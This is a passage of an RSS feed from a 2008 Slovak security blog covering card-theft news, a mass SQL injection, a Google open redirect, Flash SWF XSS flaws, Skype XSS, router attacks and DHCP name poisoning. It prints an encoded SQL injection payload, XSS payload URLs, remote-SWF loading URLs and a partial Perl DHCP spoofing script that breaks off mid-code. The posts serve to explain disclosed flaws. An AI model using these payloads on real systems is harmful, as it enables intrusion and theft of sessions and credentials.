kariet</title><description>&lt;span style=&quot;font-family:arial;&quot;&gt;Traja medzinárodní hackery boli údajne obžalovaný z používania počítačových a programátorských znalostí za účelom odcudzenia a predaja čísiel kreditných kariet, ktoré vlastnili zákazníci reštaurácie Dave &amp;amp; Buster&#39;s.Toto vyhlásenie v pondelok vydal justičný úrad.&lt;br /&gt;U jedného zo zatknutých mužov (Maksym Yastremskiy z Ukrajiny) boli nájdené milióny čísiel odcudzených kreditných kariet, ktoré sa však nevzťahovali k dotyčnej reštaurácii.&lt;br /&gt;Prípad je posledným v moloobchodnej sieti, v ktorej sa hackery dostali do firemných sietí a zachytávali transakcie prevedené kreditnou kartou v reálnom čase.Podobný útok, ale väčších rozmerov bol vykonaný na sieť predajcov obuvi DSW v roku 2005, kde bolo ohrozených 1,4 milióna zákazníkov.Taktiež dlhá infiltrácia maloobchodného gigantu T.J.Maxx spôsobila, že bolo nechránených prinajmenšom 45 miliónov zákazníkov.&lt;br /&gt;&lt;br /&gt;Viac &lt;a href=&quot;http://blog.wired.com/27bstroke6/2008/05/international-h.html&quot;&gt;info&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;</description><link>http://webprotected.blogspot.com/2008/05/traja-hackery-obvinen-zo-sniffovania.html</link><author>noreply@blogger.com (Unknown)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-464579124419695192.post-3479623306995555088</guid><pubDate>Sat, 26 Apr 2008 09:01:00 +0000</pubDate><atom:updated>2008-04-26T12:53:51.087+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">News</category><title>Masívny SQL Injection</title><description>&lt;span style=&quot;font-family:arial;&quot;&gt;A je to tu, další v poradí z hromadných SQL Injection útokov, ktorý infikoval tisíce webových stránok.&lt;br /&gt;Výsledok Google vyhľadávania sa pohybuje niekde na hranici 510,000 modifikovaných stránok.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur=&quot;try {parent.deselectBloggerImageGracefully();} catch(e) {}&quot; href=&quot;http://bp0.blogger.com/_dAfNUNjtqZQ/SBL1M07ZXSI/AAAAAAAAAEg/_sWUq_VwlEc/s1600-h/sqlinjection_google.jpg&quot;&gt;&lt;img style=&quot;margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;&quot; src=&quot;http://bp0.blogger.com/_dAfNUNjtqZQ/SBL1M07ZXSI/AAAAAAAAAEg/_sWUq_VwlEc/s200/sqlinjection_google.jpg&quot; alt=&quot;&quot; id=&quot;BLOGGER_PHOTO_ID_5193482921026608418&quot; border=&quot;0&quot; /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;Čím ďalej tým viac webstránok začína používať  koncové databázy kôli ich väčšej rýchlosti a dynamike, čo taktiež znamená, že je veľmi rozhodujúce aké data budú uložené do týchto databáz pri vytvorení požiadavky.Obzvlášť vtedy, ak je užívateľovy povolený upload obsahu, ktorý sa môže nachádzať v diskusných fórach, blogoch, atd.&lt;br /&gt;Pokiaľ sa tieto data neošetria ešte pred uložením, nemôžte kontrolovať čo sa bude zobrazovať od užívateľov na stránke.A práve túto slabinu využíva tento typ SQL injekcie.Injekcia kódu vyzerá cca takto (kód nieje úplný):&lt;br /&gt;&lt;code class=&quot;something&quot;&gt;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x440045004300&lt;br /&gt;4C00410052004500200040005400200076006100720063006800610072&lt;br /&gt;00280032003500350029002C0040004300200076006100720063006800&lt;br /&gt;610072002800320035003500290020004400450043004C004100520045&lt;br /&gt;0020005400610062006C0065005F0043007500720073006F0072002000&lt;br /&gt;43005500520053004F005200200046004F0052002000730065006C0065&lt;br /&gt;0063007400200061002E006E0061006D0065002C0062002E006E006100&lt;br /&gt;6D0065002000660072006F006D0020007300790073006F0062006A0065&lt;br /&gt;00630074007300200061002C0073007900730063006F006C0075006D00&lt;br /&gt;6E00730020006200200077006800650072006500200061002E00690064&lt;br /&gt;003D0062002E0069006400200061006E006400200061002E0078007400&lt;br /&gt;7900700065003D00270075002700200061006E0064002000280062002E&lt;br /&gt;00780074007900700065003D003900390020006F007200200062002E00&lt;br /&gt;780074007900700065003D003300350020006…&lt;/code&gt;&lt;/span&gt;&lt;br /&gt;po dekódovaní:&lt;br /&gt;&lt;code class=&quot;something&quot;&gt;DECLARE @T varchar(255)&#39;@C varchar(255) DECLARE Table_Cursor&lt;br /&gt;CURSOR FOR select a.name&#39;b.name from sysobjects a&#39;syscolumns b&lt;br /&gt;where a.id=b.id and a.xtype=&#39;u&#39; and (b.xtype=99 or b.xtype=35&lt;br /&gt;or b…&lt;/code&gt;&lt;br /&gt;Následkom tejto injekcie sa nájdu všetky texty v databáze a vloží sa do nich link, ktorý odkazuje na zákerný javascript.V zásade sa útočníci obzerajú okolo stránok ASP alebo ASPX obsahujúce nejaký querystring (dynamická hodnota ako napríklad ID čláku, produktu, atd.) parameter použitý k uploadu SQL Injection kódu.&lt;br /&gt;src: &lt;a href=&quot;http://www.f-secure.com/weblog/archives/00001427.html&quot;&gt;f-secure&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;rss:item&quot;  style=&quot;font-family:arial;&quot;&gt;&lt;/span&gt;</description><link>http://webprotected.blogspot.com/2008/04/masvny-sql-injection.html</link><author>noreply@blogger.com (Unknown)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://bp0.blogger.com/_dAfNUNjtqZQ/SBL1M07ZXSI/AAAAAAAAAEg/_sWUq_VwlEc/s72-c/sqlinjection_google.jpg" height="72" width="72"/><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-464579124419695192.post-7799211107480713679</guid><pubDate>Tue, 22 Apr 2008 16:26:00 +0000</pubDate><atom:updated>2008-07-28T16:10:43.992+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Security</category><title>Google Http Redirection</title><description>&lt;span style=&quot;font-family:arial;&quot;&gt;Vďaka Googlu môžete svojvoľne robiť redirect (presmerovanie) na zoznam.sk z ó božského google.com :)&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://www.google.com/pagead/iclk?sa=l&amp;amp;ai=FnzbwS&amp;amp;num=67575&amp;amp;adurl=http://zoznam.sk/&quot;&gt;Google - zoznam.sk&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;V podstate môžete urobiť presmerovanie na ktorúkoľvek webovú stránku, http požiadavka vyzerá takto:&lt;br /&gt;&lt;code class=&quot;something&quot;&gt;http://www.google.com/pagead/iclk?sa=l&amp;amp;ai=FnzbwS&amp;amp;num=67575&amp;amp;adurl=http://zoznam.sk/&lt;/code&gt;&lt;br /&gt;Teória je, že Google neoveruje pole &lt;span style=&quot;color: rgb(51, 51, 255);&quot;&gt;ai=&lt;/span&gt; alebo &lt;span style=&quot;color: rgb(51, 51, 255);&quot;&gt;num=&lt;/span&gt; , tým pádom môžete vkladať prakticky čokoľvek a url bude stále validná.Príklad:&lt;br /&gt;&lt;/span&gt;&lt;code class=&quot;something&quot;&gt;http://www.google.com/pagead/iclk?sa=l&amp;amp;ai=presmerovanie&amp;amp;num=na_zoznam&amp;amp;adurl=http://zoznam.sk/&lt;/code&gt;&lt;br /&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;Tu by sa dal veľmi šikovne zakomponovať aj nejaký download, určite sa s tým dá pekne pohrať.No dúfajme, že Google to v najbližšej dobe &quot;fixne&quot;.&lt;/span&gt;</description><link>http://webprotected.blogspot.com/2008/04/google-http-redirection.html</link><author>noreply@blogger.com (Unknown)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-464579124419695192.post-1441807658437785311</guid><pubDate>Tue, 08 Apr 2008 14:52:00 +0000</pubDate><atom:updated>2008-07-28T16:14:14.544+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Security</category><category domain="http://www.blogger.com/atom/ns#">XSS</category><title>XSS zraniteľnosti v Shockwave Flash súboroch</title><description>&lt;span style=&quot;font-family:arial;&quot;&gt;Kritické zraniteľnosti sú do veľkej miery obsiahnuté používaním publikačných nástrojov (avšak tento problém sa nevsťahuje výhradne na tieto nástroje), ktoré automaticky generujú Shockwave Flash (swf) súbory, ako napríklad Adobe Dreamweaver, Adobe Contribute, Adobe Acrobat Connect, InfoSoft FusionCharts alebo Techsmith Camtasia.A práve webové stránky, ktoré zakladajú na vytváraní swf súborov, sú náchylné k Cross-Site Scriptingu.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-weight: bold; color: rgb(255, 0, 0);font-family:courier new;font-size:130%;&quot;  &gt;XSS&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Ako už všetci isto vieme, Cross-site scripting je útok na úživateľa pomocou webovej aplikácie.Ak je webová aplikácia zraniteľná na XSS a útočník naláka užívateľa kliknúť na odkaz k nakazenej webovej aplikácií, potom útočník môže získať úplnú kontrolu nad užívateľským session.Útočník môže vykonať hocijakú JavaScriptovú operáciu vo svoj prospech (napríklad online transakcia v bankovom systéme alebo aj zmena cesty k webstránke (uplatnenie phisingu)).&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(255, 0, 0);font-size:130%;&quot; &gt;&lt;span style=&quot;font-weight: bold;font-family:courier new;&quot; &gt;XSS swf zraniteľnosti&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Nanešťastie tieto xss bugy sú vcelku bežnou záležitosťou.Mnoho publikačných nástrojov, ktoré automaticky vytváraju (generujú) swf, vkladajú identický a samozrejme zraniteľný ActionScript do všetkých uložených swf alebo do všetkých kontrolných swf (&quot;save as SWF&quot;, &quot;export to SWF&quot;, atd.).&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(255, 0, 0);font-size:130%;&quot; &gt;&lt;span style=&quot;font-weight: bold;font-family:courier new;&quot; &gt;Adobe Dreamweaver&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&quot;skinName&quot; parameter je akceptovaný Flashovými súbormi vytvorenými pomocou &lt;a href=&quot;http://www.adobe.com/devnet/flash/articles/flv_tutorial_03.html&quot;&gt;funkcie&lt;/a&gt; &quot;Insert Flash Video&quot;.&quot;skinName&quot; môže byť použitý k donúteniu obete načítať ľubovoľné URL a to aj vrátane &quot;asfunction&quot; spracovania protokolu:&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;code style=&quot;font-family: arial;&quot; class=&quot;something&quot;&gt; http://www.example.com/FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//&lt;/code&gt;&lt;br /&gt;Táto záležitosť bola fixnutá v Decembrovom Flash Player release.Navyše, útočník taktiež môže pomocou &quot;skinName&quot; pritlačiť obeť k múru a aplikovať na ňu ľubovoľné SWF vedúce k Cross Site Flashingu (XSF) a XSS útokom:&lt;br /&gt;&lt;br /&gt;&lt;code style=&quot;font-family: arial;&quot; class=&quot;something&quot;&gt;http://www.example.com/FLVPlayer_Progressive.swf?skinName=http://rcannings.googlepages.com/DoKnowEvil&lt;/code&gt;&lt;br /&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;Oprava bola prevedená v Januáry.Vid Adobe &lt;a href=&quot;http://www.adobe.com/support/security/bulletins/apsb08-01.html&quot;&gt;report&lt;/a&gt; (Adobe bol kontaktovaný 8. Augusta 8007).&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size:130%;&quot;&gt;&lt;span style=&quot;color: rgb(255, 0, 0); font-weight: bold;font-family:courier new;&quot; &gt;Adobe Acrobat Connect (vrátane Macromedia Breeze)&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&quot;main.swf&quot; je kontrolór súborov vo všetkých Connect/Breeze online prezentáciách.Tento SWF je nevhodne schvaľovaný &quot;baseurl&quot; parametrom.Takto pôsobý script injection:&lt;br /&gt;&lt;br /&gt;&lt;/span&gt; &lt;code class=&quot;something&quot;&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;http://www.example.com/main.swf?baseurl=asfunction:getURL,javascript:alert(1)//&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/code&gt;&lt;br /&gt;Toto bolo taktiež opravené v Decembrovom release.Útočník môže použiť &quot;baseurl&quot; za účelom donútenia obete a následovné načítanie ľubovoľného SWF ústiaceho do XSF alebo XSS:&lt;br /&gt;&lt;br /&gt;&lt;code style=&quot;font-family: arial;&quot; class=&quot;something&quot;&gt;http://www.example.com/main.swf?baseurl=http://rcannings.googlepages.com/DoKnowEvil.swf%3f&lt;/code&gt;&lt;br /&gt;Adobe bol kontaktovaný 31. Júla 2007, Adobe &lt;a href=&quot;http://www.adobe.com/support/security/bulletins/apsb08-02.html&quot;&gt;report&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-weight: bold; color: rgb(255, 0, 0);font-size:130%;&quot; &gt;&lt;span style=&quot;font-family:courier new;&quot;&gt;InfoSoft FusionCharts&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Jedna z týchto záležitostí bola nájdená aj v FusionCharts, konkrétne parameter &quot;dataURL&quot;  umožňuje svojvoľné vkladanie HTML do &quot;TextArea&quot;.Toto umožňuje útočníkom nahrávať SWF z ostatných domén:&lt;br /&gt;&lt;br /&gt;&lt;code style=&quot;font-family: arial;&quot; class=&quot;something&quot;&gt;http://www.example.com/Example.swf?debugMode=1&amp;amp;dataURL=%27%3E%3Cimg+src%3D%22http%3A//rcannings.googlepages.com/DoKnowEvil.swf%3F.jpg%22%3E&lt;/code&gt;&lt;br /&gt;InfoSoft bol s týmto oboznámený 2. Septembra 2007.Release bol vydaný niekedy na konci Septembra.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-weight: bold; color: rgb(255, 0, 0);font-family:courier new;font-size:130%;&quot;  &gt;Autodemo&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Autodemo je servisní poskytovaeľ,  no nie publikačných nástrojov.Avšak, tak ako publikačné nástroje, aj oni používajú bežné kontrolné súbory v demách.&quot;onend&quot; parameter v &quot;control.swf&quot; nahráva ľubovoľné URL vrátane JavaScriptového protokol handleru:&lt;br /&gt;&lt;br /&gt;&lt;code style=&quot;font-family: arial;&quot; class=&quot;something&quot;&gt;http://www.example.com/control.swf?onend=javascript:alert(1)//&lt;/code&gt;&lt;br /&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;Autodemo bol kontaktovaný 17. Augusta 2007.Fixáciu sme mohli vidieť už v Auguste.&lt;/span&gt; &lt;span style=&quot;font-family:arial;&quot;&gt;Autodemo avšak nieje jediným servisným providerom, ktorý obsahoval XSS vo svojich produktoch, veľké množstvo z nich ani len netušilo, že ich SWF sú zraniteľné.&lt;/span&gt;</description><link>http://webprotected.blogspot.com/2008/04/xss-zraniteosti-v-shockwave-flash.html</link><author>noreply@blogger.com (Unknown)</author><thr:total>2</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-464579124419695192.post-3309004142260830322</guid><pubDate>Sat, 05 Apr 2008 10:33:00 +0000</pubDate><atom:updated>2008-07-29T12:19:55.127+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Security</category><category domain="http://www.blogger.com/atom/ns#">XSS</category><title>Zraniteteľnosti v Skype</title><description>&lt;span style=&quot;font-family:arial;&quot;&gt;Útočný vektor je trochu zamotaný, ale veľmi často vhodný a celkom praktický. Uživateľ jednoducho potrebuje navštíviť &lt;a href=&quot;http://dailymotion.com/&quot;&gt;DailyMotion&lt;/a&gt; (náchylný na Cross-site scripting) a prostredníctvom Skypu pridať tlačítkom video na chat, toto je základná chyba, ktorá obsahuje zraniteľnosť  typu Cross-site Scripting. Tento typ scenára môže byť dosiahnutý niekoľkými spôsobmi, ale verím, že väčšina prístupov by bola tiež možná aj sociálnym inžinierstvom na uživateľa alebo spammovanie DailyMotion pomocou stoviek dalších infikovaných videí. &lt;a href=&quot;http://aviv.raffon.net/2008/01/17/SkypeCrosszoneScriptingVulnerability.aspx&quot;&gt;Aviv&lt;/a&gt; a &lt;a href=&quot;http://www.gnucitizen.org/about/&quot;&gt;pdp&lt;/a&gt; už o chybe v Skype nazývanej Local Zone vedely už niekoľko mesiacov. Predsalen toto je prvá významnejšia zraniteľnosť, ktorá očividne poukazuje na (ne)bezpečnosť Skypu. Taktiež sa tam nachádzajú dalšie útočné vektory, na ktoré si treba dávať pozor, ajkeď pracujú jedine v sieti, kde útočník môže ovplyvniť komunikáciu (mitm útoky, packet injection na wifi siete, sieťový spoofing, atd.). A tiež mi nedá nespomenúť, že  Skypový traffic čiastočne prechádza nezakódovaným kanálom, čo môže mať vážne dôsledky. Nuž, čo z toho všetkého vyplýva? Dávajte si pozor na uploadovanie videí cez Skype pokiaľ túto zraniteľosť &lt;/span&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;ešte &lt;/span&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;nemáte ošetrenú. Nemôžem vám rozkázať aby ste prestali použivať tento sw, ajkeď chyby v článku sú už trochu staršieho dáta, je len na vás čo si z tohto vcelku stručného článku odnesiete..&lt;/span&gt;</description><link>http://webprotected.blogspot.com/2008/04/zranitetenosti-v-skype.html</link><author>noreply@blogger.com (Unknown)</author><thr:total>3</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-464579124419695192.post-8435128395900700140</guid><pubDate>Thu, 03 Apr 2008 19:08:00 +0000</pubDate><atom:updated>2008-07-29T12:17:24.268+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Security</category><category domain="http://www.blogger.com/atom/ns#">XSS</category><title>XSSing siete 2</title><description>&lt;span style=&quot;font-family:arial;&quot;&gt;Predovšetkým lokálna sieť potrebuje preskúmať &quot;živé&quot; hosty (každý host potrebuje byť zoskenovaný pomocou URL databázy, aby  sa mohol detekovať typ a verzia firmwaru). Akonáhle je detekovaný firmware, môžeme naňho uskutočniť vhodný útok. Pokiaľ užívateľ trávi značné množstvo času na nebezpečných stránkach, útok väčšinou nebude mať úspech. Na(ne)šťastie existuje niekoľko dalšich možných útokov, ktoré môžu byť použité na zabezpečenie úspešnej exploitácie.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(255, 0, 0); font-weight: bold;font-family:courier new;font-size:130%;&quot;  &gt;Webové trójske kone&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;Predpokladám, že každý viete cca čo to trójsky koník je ( program ktorý sa javí ako úplne neškodný, ale pritom je to zákerná sviňa, ktorá nás má nejakým spôsobom poškodiť). Webové trojany sú používané na vytvorenie určitého dôverného vzťahu s návšetvníkmi. Príklad: útočník môže začleniť do YouTube playeru nebezpečný kód, ktorý sa postará o zvyšok útoku, zatiaľ čo si ho obeť spokojne prehráva. Nebadateľný zákerný kód môže vykonávať bezpečnostný audit lokálnej siete pomocou JavaScriptu, ActionScriptu, Javy, XML, XSLT a tiež kombinovať ich.&lt;br /&gt;&lt;br /&gt;Útok na sieť tiež môže byť vykonaný za pomoci Flash-u. Flash 7 má flexibilitu vykonávať cross domény pomocou požiadavky a to bez obmedzenia (Flash 8 je už fixnutý). Útočník potrebuje spraviť &lt;/span&gt;&lt;span style=&quot;font-family:arial;&quot;&gt; iframe vyvolávajúci zraniteľnosť URL za účelom injekcie JavaScriptového kódu v rámci atakovania domény. Keď je toto dosiahnuté , prehliadač umožní XmlHttpRequest bez akéhokoľvek obmedzenia .V AJAX svete, &lt;/span&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;XmlHttpRequest je väčšinou dobre známa technológia na vykonávanie POST, GET, PUT, TRACE, TRACK, atď. Výsledkom toho, útočník môže úspešne bypassnúť(obísť) doménové obmedzenia, ale o tom až niekedy inokedy&lt;br /&gt;&lt;br /&gt;src: &lt;a href=&quot;http://www.gnucitizen.org/about/&quot;&gt;pdp&lt;/a&gt;&lt;/span&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;&lt;br /&gt;Cya!&lt;/span&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;&lt;br /&gt;&lt;/span&gt;</description><link>http://webprotected.blogspot.com/2008/04/xssing-siete-2.html</link><author>noreply@blogger.com (Unknown)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-464579124419695192.post-2636052547882577101</guid><pubDate>Tue, 01 Apr 2008 20:36:00 +0000</pubDate><atom:updated>2008-07-29T12:13:51.527+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Security</category><category domain="http://www.blogger.com/atom/ns#">XSS</category><title>XSSing siete</title><description>&lt;span style=&quot;font-family:arial;&quot;&gt;Pokúsim sa okrajovo vysvetliť teóriu routerov/vstupných brán (gateways). &lt;/span&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;Za účelom tohoto cvičenia sú tri nevyhnutné predpoklady ktoré musia byť splnené: stránka, ktorá je kontrolovaná útočníkom (evil.com), router náchylný k XSS a užívateľ navštevujúci evil.com&lt;br /&gt;&lt;br /&gt;Akonáhle užívateľ navštívy evil.com, temný JavaScriptový kód vykoná hľadanie v lokálnej LAN, následovne nájde &quot;živé&quot; mašiny a približne určí pozíciu routera. Ihneď ako je router identifikovaný, zákerný skript zobrazí softwarovú verziu. Tento krok môže byť preskočený, ale je to určite dobrá vec ak chce byť napádateľ utajený. Myslím na to, že moderné browsery majú doménové obmedzenia, čo znamená, že efektné AJAX techniky ako napríklad &lt;a href=&quot;http://en.wikipedia.org/wiki/XMLHttpRequest&quot;&gt;XmlHttpRequest&lt;/a&gt; objekty tu jednoducho nepracujú. Útočný vektor objasnily &lt;a href=&quot;http://www.spidynamics.com/assets/documents/JSportscan.pdf&quot;&gt;SPI Dynamics&lt;/a&gt;, aj keď by mal fungovať vo všetkých prehliadačoch...Medzitým JavaScriptový kód pohltil niekoľko požiadaviek voči routeru&lt;/span&gt; &lt;span style=&quot;font-family: arial;&quot;&gt;pre spoločný image súbor. Rozdielne typy routerov maju rozdielne images, takže je to odlišný postup na identifikáciu serverového softwaru.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;V závislosti od nazbieraných výsledkov skenovania procesu, sme pripravený odhaliť narušený XSS tok. Tento XSS tok je používaný zákerným JavaScriptom na zobrazovanie kódu routerovej domény. Tento krok je rozhodujúci. Moderné prehliadače vám neumožňujú vykonať cross doménovej požiadavky, ale pokiaľ to vopred predpokladáme mohli by sme teoreticky využiť nejáku chybu v prehliadači, avšak nieje to príliš čistý postoj...&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;V každom prípade, JavaScript vytvorý neviditeľný iframe na evil.com, ktorý zo sebou prináša útok. Iframe source obsahuje URL, ktorá využíva XSS tok v routery. Odvtedy má kód účinok na routerovú doménu, ktorá má určitý druh internej IP. To znamená, že zvyšok útoku môže byť konštruovaný od XmlHttpRequest objektov, ktoré poskytujú väčšiu kontrolu vo vstupe aj výstupe.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;V záverečnej etape, kód prenesieme pomocou routerového XSS toku vykonávajúceho login a obnovu užívateľa, ktorý je neskôr podrobený vzdialenej &quot;zberni&quot; kontrolovanej úočníkom. Okrem toho by si útočník mohol priať zbúrať bezpečnostný level využitého stroja aby sa mohol opätovne vrátiť...&lt;/span&gt;</description><link>http://webprotected.blogspot.com/2008/04/xssing-siete.html</link><author>noreply@blogger.com (Unknown)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-464579124419695192.post-8223445665696166701</guid><pubDate>Tue, 01 Apr 2008 14:32:00 +0000</pubDate><atom:updated>2008-07-29T12:08:40.635+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Security</category><category domain="http://www.blogger.com/atom/ns#">WiFi</category><title>Rooting verejnej WiFi siete</title><description>&lt;span style=&quot;color: rgb(0, 0, 0); font-family: arial;font-family:arial;&quot; &gt;Hacking je disciplína, ktorá vyžadaje veľa kreativity a motivácie. Porozumenie príde postupom času so skúsenostiami.&lt;br /&gt;&lt;br /&gt;Dnes by som chcel pokryť niektoré zaujímavé útočné vektory, ktoré môžu byť vykonávané ihneď ako útočník dostane prístup k sieti(otvorené WiFi siete a bezplatné WiFi HotSpoty sú v slušnej miere zraniteľné). Neskôr &lt;/span&gt;&lt;span style=&quot;color: rgb(0, 0, 0); font-family: arial;font-family:arial;&quot; &gt;zmieňované&lt;/span&gt;&lt;span style=&quot;color: rgb(0, 0, 0); font-family: arial;font-family:arial;&quot; &gt; útočné techniky sú vyvinuté &lt;a href=&quot;http://www.blogger.com/www.gnucitizen.org&quot;&gt;Petkovými&lt;/a&gt; osobnými skúsenoťami  s DHCP.&lt;br /&gt;&lt;br /&gt;Jano navštívi verejný WiFi HotSpot. Akonáhle je spojený s WiFi sieťou, DHCP správa je medzičasom vymenená za jeho počítač a DHCP server, ktorý má väčšinou nastavenú vstupnú &quot;bránu&quot; defaultne. Na základe toho stavu Ip adresa je rezervovaná pre klienta a mašina je zhodená do siete. Z toho bodu Jano môže vidieť na mašinky pomocou ARP skenovania siete alebo dokonca vykonávanie niektorých pingov (ICMP), keď sieť nieje rozdelená, čo je dosť častý prípad.&lt;br /&gt;&lt;br /&gt;Toto nieje nejáko obzvlášť zaujímavé. Ak si budete starostlivo všimať DHCP &lt;/span&gt;&lt;strong style=&quot;font-family: arial; color: rgb(0, 0, 0);&quot;&gt;discover-offer-request-ack&lt;/strong&gt;&lt;span style=&quot;font-family: arial;&quot;&gt; dialóg, budete informovaný, že každý paket zasvätený DHCP klientom obsahujúci niekoľko voliteľných oblastí reprezentuje meno klienta. Mnoho sietí/routerov bude spokojne prijímať mená a používať  ich ako súčasť svojej DNS služby. Nehovoriac o tom, že DNS lookup-y budú analyzovať Ip adresy, a to je celkom preblém. Konečný záver je teda jasný: útočník môže registrovať hocijaké meno v rámci onej siete. &lt;/span&gt;&lt;span style=&quot;font-style: italic; font-family: arial;&quot;&gt;&quot;Aký je potom bezpečnostný problém?&quot;&lt;/span&gt;&lt;span style=&quot;font-family: arial;&quot;&gt; . Verte alebo nie, je to celkom závažný bezpečnostný problém, ktorého pozornosť vzbudil nielen u bezpečnostných technikov.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;Mnoho laptopov je konfigurovaných na používanie krátkych mien, keď sú využívané v rámci spoločnosti a v domácom prostredí. Jednoducho umiestnené proxy servery je pravdepodobne volané &lt;/span&gt;&lt;span style=&quot;font-weight: bold; font-family: arial;&quot;&gt;proxy&lt;/span&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;, mailové servery sú volané &lt;/span&gt;&lt;span style=&quot;font-weight: bold; font-family: arial;&quot;&gt;mail&lt;/span&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;, WPAD server je volaný &lt;/span&gt;&lt;span style=&quot;font-weight: bold; font-family: arial;&quot;&gt;wpad&lt;/span&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;, a tak dalej. V situácií keď je klient spojený s HotSpotom, spýta sa na meno, ale nenájde povinnú ip a tak DNS server nemôže rozhonúť o mene. Ale toto nieje  prípad s každou aktívnou DHCP sieťou. Meno klienta v DHCP môže byť stanovené použitím a ako taký môže vytvárať doménové mená pre proxy a mail. To znamená, že použitím jednoduchej UDP DHCP požiadavky, útočník môže zmeniť meno známej služby a presmerovať jeho traffic. T&lt;/span&gt;&lt;span style=&quot;font-family: arial;&quot; class=&quot;messageIn&quot;&gt;oto je to, čo by som chcel odkázať na DHCP name poisoning  attack.&lt;/span&gt;&lt;span style=&quot;font-family: arial;&quot;&gt; Situácia je potom ešte horšia ako sa zdá.&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;messageIn&quot;&gt;&lt;br /&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;pdp navrhol jednoduchý skript s ktorým môžete testovať či je vaša sieť zraniteľná alebo nie.&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;pre&gt;&lt;code class=&quot;something&quot;&gt;#!/usr/bin/env perl&lt;br /&gt;&lt;br /&gt;use File::Basename;&lt;br /&gt;use IO::Socket::INET;&lt;br /&gt;use Net::DHCP::Packet;&lt;br /&gt;use Net::DHCP::Constants;&lt;br /&gt;&lt;br /&gt;$usage = &quot;usage: &quot;.basename($0).&quot; &lt;mac&gt; &lt;ip&gt; &lt;domain&gt; &lt;name&gt;\n&quot;;&lt;br /&gt;&lt;br /&gt;$mac = shift or die $usage;&lt;br /&gt;$ip = shift or die $usage;&lt;br /&gt;$domain = shift or die $usage;&lt;br /&gt;$name = shift or die $usage;&lt;br /&gt;&lt;br /&gt;$request = Net::DHCP::Packet-&gt;new(&lt;br /&gt;Xid =&gt; 0x11111111,&lt;br /&gt;Flags =&gt; 0x0000,&lt;br /&gt;Chaddr =&gt; $mac,&lt;br /&gt;DHO_DHCP_MESSAGE_TYPE() =&gt; DHCPREQUEST(),&lt;br /&gt;DHO_HOST_NAME() =&gt; $name,&lt;br /&gt;DHO_VENDOR_CLASS_IDENTIFIER() =&gt; $mac,&lt;br /&gt;DHO_DHCP_REQUESTED_ADDRESS() =&gt; $ip,&lt;br /&gt;DHO_DOMAIN_NAME() =&gt; $domain,&lt;br /&gt;DHO_DHCP_CLIENT_IDENTIFIER() =&gt; $mac&lt;br /&gt;);&lt;br /&gt;&lt;br /&gt;$ack = Net::DHCP::Packet-&gt;new(&lt;br /&gt;Xid =&gt; 0x11111111,&lt;br /&gt;Flags =&gt; 0x0000,&lt;br /&gt;Chaddr 